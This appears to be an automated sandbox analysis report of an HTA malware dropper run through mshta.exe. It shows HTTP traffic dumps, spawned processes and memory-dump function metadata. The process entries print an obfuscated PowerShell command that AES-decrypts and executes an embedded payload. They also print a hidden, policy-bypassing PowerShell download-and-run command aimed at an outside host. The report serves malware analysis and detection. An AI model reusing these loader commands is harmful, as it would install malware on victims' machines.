2025-01-01 16:11:25 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pd0f63fhuvcjqu6vfhblm3buga; expires=Sun, 27 Apr 2025 09:58:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucl5LptcdVuYeKKH3ITXB5oBLDABucNGkmeZ6R9%2BtIdjxymk%2F9JjqI2gZeWtxP7q%2FnQuensNVtunN6u2o6CXnzx81hMRgdgOoxVFMClX8wvelbr1KkPZlvICjD1Y5s3ZY2D1EQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8f86e1343ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1564&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=983&delivery_rate=1813664&cwnd=221&unsent_bytes=0&cid=261027efabe315df&ts=455&x=0"
2025-01-01 16:11:25 UTC	240	IN	Data Raw: 62 66 63 0d 0a 78 38 47 4a 78 4e 76 50 64 56 43 4e 6e 4b 50 73 6c 67 53 4e 66 2b 6f 6f 45 61 70 4c 7a 59 53 75 68 62 57 43 4f 46 74 7a 4e 42 71 63 75 71 75 69 72 2b 31 50 59 61 47 2b 78 73 36 73 4e 61 46 64 6a 67 6f 72 69 41 32 45 2f 75 48 58 77 2f 56 70 49 51 56 6b 54 76 57 4b 34 37 47 49 6a 55 41 64 33 4f 58 5a 75 4e 6c 57 75 52 75 65 58 33 50 45 50 35 75 33 6d 75 37 4d 73 6e 51 44 4b 30 78 41 39 72 50 54 67 34 66 67 4a 78 54 43 70 4a 71 4b 7a 33 58 43 53 71 4e 67 65 74 49 50 67 63 72 6a 73 50 33 71 43 6d 67 78 51 58 7a 32 6d 65 2b 74 6a 34 4d 6b 4a 4f 6e 36 34 62 2f 62 66 75 59 64 30 6d 31 63 6e 54 48 39 76 63 66 71 67 75 6c 66 50 69 64 78 56 37 54 78 38 36 2b 2b 68 78 63 7a 79 71 6d 55 75 76 49 76 78 7a 47 Data Ascii: bfcx8GJxNvPdVCNnKPslgSNf+ooEapLzYSuhbWCOFtzNBqcuquir+1PYaG+xs6sNaFdjgoriA2E/uHXw/VpIQVkTvWK47GIjUAd3OXZuNlWuRueX3PEP5u3mu7MsnQDK0xA9rPTg4fgJxTCpJqKz3XCSqNgetIPgcrjsP3qCmgxQXz2me+tj4MkJOn64b/bfuYd0m1cnTH9vcfqgulfPidxV7Tx86++hxczyqmUuvIvxzG
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 38 61 79 43 62 63 34 72 30 34 4c 58 6d 30 6b 45 77 43 30 34 74 76 70 6a 43 71 62 4b 6e 49 57 6a 55 31 35 4f 37 38 55 50 61 53 70 77 61 56 75 30 64 2f 4d 44 71 33 49 33 48 51 44 63 2b 54 46 53 67 73 38 4b 7a 73 66 77 79 47 37 72 79 78 61 50 75 66 50 35 4c 70 33 31 44 6b 79 47 63 35 74 62 68 30 50 68 33 44 7a 46 42 66 4b 75 47 32 61 32 50 6c 69 51 67 31 2f 72 67 71 50 31 30 35 44 66 53 62 56 79 64 4d 66 32 39 78 2b 71 43 38 31 38 2b 4a 31 6c 54 71 66 48 6a 70 37 36 48 46 44 50 4b 71 5a 53 36 7a 69 2f 48 4d 70 35 72 49 4a 74 7a 69 38 37 55 79 75 66 30 54 78 6f 4a 51 6b 71 54 38 38 4b 75 72 70 77 33 5a 63 44 4a 32 70 62 53 53 39 39 4c 6a 6c 78 41 79 43 57 2b 74 5a 32 78 33 76 73 49 46 79 74 73 62 5a 53 72 78 50 47 63 6b 31 6f 53 79 64 4f 62 31 64 6c 4e 2f 44 Data Ascii: 8ayCbc4r04LXm0kEwC04tvpjCqbKnIWjU15O78UPaSpwaVu0d/MDq3I3HQDc+TFSgs8KzsfwyG7ryxaPufP5Lp31DkyGc5tbh0Ph3DzFBfKuG2a2PliQg1/rgqP105DfSbVydMf29x+qC818+J1lTqfHjp76HFDPKqZS6zi/HMp5rIJtzi87Uyuf0TxoJQkqT88Kurpw3ZcDJ2pbSS99LjlxAyCW+tZ2x3vsIFytsbZSrxPGck1oSydOb1dlN/D
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 6e 52 32 70 72 2b 54 49 77 63 45 4a 61 6b 74 79 55 37 32 4f 32 37 4b 73 6e 67 38 6d 33 63 69 52 70 2f 78 78 33 6a 33 66 5a 55 44 54 4d 5a 6e 4c 2f 4c 48 52 39 6b 38 35 48 55 42 4d 39 50 58 69 76 65 75 44 4c 51 6a 36 79 63 6d 68 6f 30 50 52 55 4b 68 73 58 70 4a 79 6e 64 33 66 79 6f 44 4c 63 44 41 4c 63 46 61 4a 6a 4c 79 4d 73 2f 31 47 45 76 6a 35 6b 72 54 77 62 64 6b 7a 75 31 78 31 7a 41 6d 65 79 64 54 75 31 37 70 39 46 6b 52 4f 4b 76 36 6f 35 76 4f 77 71 42 41 45 79 4e 48 51 33 4f 78 76 36 44 65 49 53 31 61 66 66 4a 76 67 68 63 2f 34 39 6e 74 71 51 67 78 63 6a 72 76 47 6c 71 32 34 4a 43 72 37 7a 50 66 65 33 57 37 34 4c 4b 67 64 58 50 73 79 74 39 44 68 31 34 48 6d 54 43 77 52 57 6d 36 52 38 72 32 76 6f 76 38 35 43 4e 58 72 39 6f 62 62 4d 63 6f 6a 78 57 70 Data Ascii: nR2pr+TIwcEJaktyU72O27Ksng8m3ciRp/xx3j3fZUDTMZnL/LHR9k85HUBM9PXiveuDLQj6ycmho0PRUKhsXpJynd3fyoDLcDALcFaJjLyMs/1GEvj5krTwbdkzu1x1zAmeydTu17p9FkROKv6o5vOwqBAEyNHQ3Oxv6DeIS1affJvghc/49ntqQgxcjrvGlq24JCr7zPfe3W74LKgdXPsyt9Dh14HmTCwRWm6R8r2vov85CNXr9obbMcojxWp
2025-01-01 16:11:25 UTC	97	IN	Data Raw: 62 33 48 36 6f 48 6b 5a 48 52 43 66 32 6d 44 6d 65 53 75 75 71 35 4d 48 4f 37 62 6c 70 62 33 59 2f 6c 55 69 46 31 32 32 69 71 62 31 70 33 49 7a 66 64 62 50 78 67 43 62 4b 4f 59 34 34 32 68 6f 69 55 36 7a 39 69 61 71 39 39 77 2b 54 6d 32 42 31 2f 36 50 35 76 76 2b 74 50 54 73 58 30 4a 0d 0a Data Ascii: b3H6oHkZHRCf2mDmeSuuq5MHO7blpb3Y/lUiF122iqb1p3IzfdbPxgCbKOY442hoiU6z9iaq99w+Tm2B1/6P5vv+tPTsX0J
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 32 61 38 38 0d 0a 41 51 52 31 71 49 37 54 76 6f 4f 48 4a 52 79 34 30 5a 48 61 38 6e 7a 73 47 4c 68 76 49 70 34 6f 35 73 66 64 74 4d 66 7a 56 6a 34 67 51 46 6d 51 6c 76 79 72 76 4b 73 47 47 66 2f 6b 2b 39 54 41 55 75 34 74 33 33 35 4e 68 58 32 41 30 4a 62 51 30 63 68 67 48 68 46 52 54 6f 4f 6e 38 4b 69 61 67 77 63 39 7a 36 76 4b 71 64 45 30 2b 42 61 6f 55 46 58 5a 4a 34 50 58 32 4f 6d 47 32 6d 30 49 4b 77 4d 78 69 6f 44 2b 74 34 4c 2b 4c 41 4c 35 74 2b 75 6b 39 47 33 33 46 61 56 35 4a 4a 31 37 6d 73 44 6b 38 4e 37 49 41 44 41 4b 42 46 61 66 6d 66 47 39 6e 2f 67 2f 4d 74 47 7a 79 36 37 53 64 63 4d 34 6e 6e 42 47 6d 44 47 65 37 73 62 68 2f 64 42 32 50 52 31 6a 58 62 2b 55 2f 4b 66 76 68 78 4d 69 34 4b 37 71 74 73 52 64 35 69 32 51 58 58 7a 6d 50 4a 7a 58 7a Data Ascii: 2a88AQR1qI7TvoOHJRy40ZHa8nzsGLhvIp4o5sfdtMfzVj4gQFmQlvyrvKsGGf/k+9TAUu4t335NhX2A0JbQ0chgHhFRToOn8Kiagwc9z6vKqdE0+BaoUFXZJ4PX2OmG2m0IKwMxioD+t4L+LAL5t+uk9G33FaV5JJ17msDk8N7IADAKBFafmfG9n/g/MtGzy67SdcM4nnBGmDGe7sbh/dB2PR1jXb+U/KfvhxMi4K7qtsRd5i2QXXzmPJzXz
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 4c 4b 44 31 5a 66 36 4b 43 36 49 61 56 76 6a 45 35 34 39 75 55 6c 71 56 32 76 53 69 72 63 58 75 66 4c 36 6a 53 34 4e 58 44 7a 52 4d 51 43 32 35 4a 67 70 43 69 73 49 69 36 42 77 66 6d 72 5a 58 64 31 57 58 48 43 37 39 61 49 4f 34 6e 6e 4c 57 58 34 2f 54 52 66 44 4a 48 41 32 43 33 6e 61 62 76 6a 5a 6b 63 5a 2b 6e 4c 30 4e 2f 51 56 62 55 62 33 68 70 72 77 53 36 6d 31 50 79 7a 31 2f 52 2b 62 6b 74 33 64 4c 58 34 77 6f 2b 66 76 52 63 49 77 73 37 56 6c 65 42 4b 36 67 69 5a 59 6d 6e 7a 45 72 6d 76 36 66 2f 45 78 6e 39 71 4b 77 64 79 38 50 48 65 67 4a 47 36 48 68 71 31 39 39 72 63 32 6c 7a 56 42 72 4a 38 52 65 34 4e 67 71 2f 57 79 2f 76 52 41 54 6b 53 51 57 33 2f 6f 38 79 55 36 36 34 38 45 73 76 33 6b 4c 72 34 62 4e 38 4f 74 67 64 64 67 53 79 6f 31 73 7a 52 30 4f Data Ascii: LKD1Zf6KC6IaVvjE549uUlqV2vSircXufL6jS4NXDzRMQC25JgpCisIi6BwfmrZXd1WXHC79aIO4nnLWX4/TRfDJHA2C3nabvjZkcZ+nL0N/QVbUb3hprwS6m1Pyz1/R+bkt3dLX4wo+fvRcIws7VleBK6giZYmnzErmv6f/Exn9qKwdy8PHegJG6Hhq199rc2lzVBrJ8Re4Ngq/Wy/vRATkSQW3/o8yU6648Esv3kLr4bN8OtgddgSyo1szR0O
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 52 6b 7a 32 74 66 32 52 74 50 73 55 4f 4c 33 49 2b 39 2f 2b 4d 37 30 6f 72 6d 4a 6b 77 51 48 31 37 39 65 31 2b 64 70 67 49 77 70 77 4c 59 32 41 2b 49 61 5a 69 77 5a 70 79 75 6a 37 75 39 68 42 77 44 32 64 66 58 66 2b 50 72 66 44 31 72 65 47 36 6d 73 55 52 6e 64 52 73 59 66 78 6e 6f 69 6a 45 6e 76 2b 7a 4f 43 48 35 6a 47 39 4d 71 78 75 49 76 5a 6b 75 74 65 5a 74 64 4c 6e 62 42 34 4c 57 31 75 31 67 4d 4b 4c 75 61 63 78 47 50 66 6c 7a 36 6e 7a 58 4e 6c 47 6f 57 52 4e 68 58 71 56 7a 75 62 76 33 64 51 41 46 6a 4a 44 61 5a 4b 64 70 70 43 51 72 54 38 31 33 37 66 52 6f 4f 35 4c 33 45 72 64 61 30 62 59 4a 5a 33 4e 79 76 33 68 77 58 45 4f 4f 32 78 74 70 59 36 78 73 37 79 71 45 52 54 50 2b 4e 53 6b 7a 48 58 43 53 4b 59 62 56 4a 30 4b 2b 75 44 70 74 65 54 51 5a 48 51 Data Ascii: Rkz2tf2RtPsUOL3I+9/+M70ormJkwQH179e1+dpgIwpwLY2A+IaZiwZpyuj7u9hBwD2dfXf+PrfD1reG6msURndRsYfxnoijEnv+zOCH5jG9MqxuIvZkuteZtdLnbB4LW1u1gMKLuacxGPflz6nzXNlGoWRNhXqVzubv3dQAFjJDaZKdppCQrT8137fRoO5L3Erda0bYJZ3Nyv3hwXEOO2xtpY6xs7yqERTP+NSkzHXCSKYbVJ0K+uDpteTQZHQ
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 5a 58 2f 39 49 71 31 42 51 6a 75 35 4e 71 57 34 31 66 50 53 71 64 35 4a 2b 30 76 71 39 37 67 77 63 48 67 51 68 77 48 59 69 6e 7a 70 4d 71 56 6e 70 34 62 4b 64 58 49 6d 35 76 62 62 63 73 4e 71 48 70 65 77 68 32 31 2f 65 76 77 32 2b 42 2b 45 43 74 65 4b 50 65 69 36 49 69 4a 70 79 63 68 2b 39 44 57 33 4d 63 30 35 6a 61 61 63 46 76 4f 4d 61 72 51 34 2b 75 65 75 31 30 4e 51 48 6c 35 74 50 62 69 6f 37 36 62 4d 42 2f 37 30 4f 57 36 35 30 4c 6e 4b 36 68 4e 58 2f 6f 75 6a 37 44 43 34 38 7a 57 54 69 67 66 42 33 69 4e 6b 74 47 33 37 34 49 6b 4a 2f 37 52 6c 62 43 35 62 4e 74 4f 6d 6d 56 41 6e 42 36 55 39 38 54 49 35 2b 70 50 4f 55 42 65 55 4c 4b 4f 2f 4c 32 51 39 7a 4a 6b 78 73 62 62 72 71 46 43 7a 79 32 59 61 6e 4c 4f 45 71 50 53 31 73 33 7a 31 45 34 4c 4d 67 56 35 Data Ascii: ZX/9Iq1BQju5NqW41fPSqd5J+0vq97gwcHgQhwHYinzpMqVnp4bKdXIm5vbbcsNqHpewh21/evw2+B+ECteKPei6IiJpych+9DW3Mc05jaacFvOMarQ4+ueu10NQHl5tPbio76bMB/70OW650LnK6hNX/ouj7DC48zWTigfB3iNktG374IkJ/7RlbC5bNtOmmVAnB6U98TI5+pPOUBeULKO/L2Q9zJkxsbbrqFCzy2YanLOEqPS1s3z1E4LMgV5
2025-01-01 16:11:25 UTC	1369	IN	Data Raw: 61 30 76 7a 63 65 70 73 6a 6c 70 65 78 4c 37 77 57 62 66 46 7a 6c 47 36 37 54 78 66 2f 41 30 58 70 75 53 6c 6c 52 2f 37 44 43 6b 36 79 6d 4a 53 50 31 36 63 57 59 6f 6d 62 55 53 62 35 38 59 4e 73 61 6f 64 62 50 34 74 4c 76 56 6a 6f 63 42 33 36 39 69 63 57 4c 37 6f 59 39 4f 2f 58 59 36 74 54 59 50 63 68 55 6b 78 78 58 6e 41 54 37 39 75 62 78 35 72 46 73 45 43 56 33 66 4c 4c 77 77 5a 47 33 2b 7a 38 64 30 62 50 5a 33 4b 64 43 75 44 69 6a 51 30 4c 37 63 36 69 7a 6e 76 2f 65 35 31 51 54 48 6e 4a 62 6b 71 2f 63 68 35 79 62 52 44 66 2f 7a 76 58 5a 78 31 47 39 42 64 4a 50 49 5a 38 38 69 39 33 63 7a 4d 2f 4a 51 51 64 63 58 45 71 2b 72 65 50 33 69 36 6f 62 46 37 33 4c 35 36 62 6a 62 38 64 48 67 56 45 68 35 68 4f 56 2f 63 69 75 2b 38 30 50 50 79 52 67 53 49 4f 74 79 Data Ascii: a0vzcepsjlpexL7wWbfFzlG67Txf/A0XpuSllR/7DCk6ymJSP16cWYombUSb58YNsaodbP4tLvVjocB369icWL7oY9O/XY6tTYPchUkxxXnAT79ubx5rFsECV3fLLwwZG3+z8d0bPZ3KdCuDijQ0L7c6iznv/e51QTHnJbkq/ch5ybRDf/zvXZx1G9BdJPIZ88i93czM/JQQdcXEq+reP3i6obF73L56bjb8dHgVEh5hOV/ciu+80PPyRgSIOty

Target ID:	0
Start time:	11:09:57
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\web44.mp4.hta"
Imagebase:	0x3b0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:09:59
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A745966437058494F437867616E6175')),[byte[]]::new(16)).TransformFinalBlock($mBfyr,0,$mBfyr.Length)); & $AjiG.Substring(0,3) $AjiG.Substring(129)
Imagebase:	0xb30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:09:59
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:10:01
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Imagebase:	0xb30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2455403030.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:10:01
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:11:13
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xb30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 06970F9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06970FBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06970FA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06970FAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06970FC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06970FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06970FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6970000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7164, Parent PID: 6616COMMON

Executed Functions

Function 040A8C10 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

LR^q, xrefs: 040A8CBD
(Xcq, xrefs: 040A8D9F

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: fbe850fea0efb6543f5041739f5f40757a4b53272298081f08b3e279a8a792f4
Instruction ID: 5f6e04b35be12dc034067f41dff2c96f39c2dd80a7609a7b0af321073cacae1a
Opcode Fuzzy Hash: fbe850fea0efb6543f5041739f5f40757a4b53272298081f08b3e279a8a792f4
Instruction Fuzzy Hash: 03527B34B00218CFEB24DB64D854BADB7B2BF85304F1184A9E949AB395DB34ED85CF52

Function 040A8C07 Relevance: 2.6, Strings: 2, Instructions: 140COMMON

Download Yara Rule

Strings

LR^q, xrefs: 040A8CBD
(Xcq, xrefs: 040A8D9F

Memory Dump Source

Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false

Joe Sandbox IDA Plugin

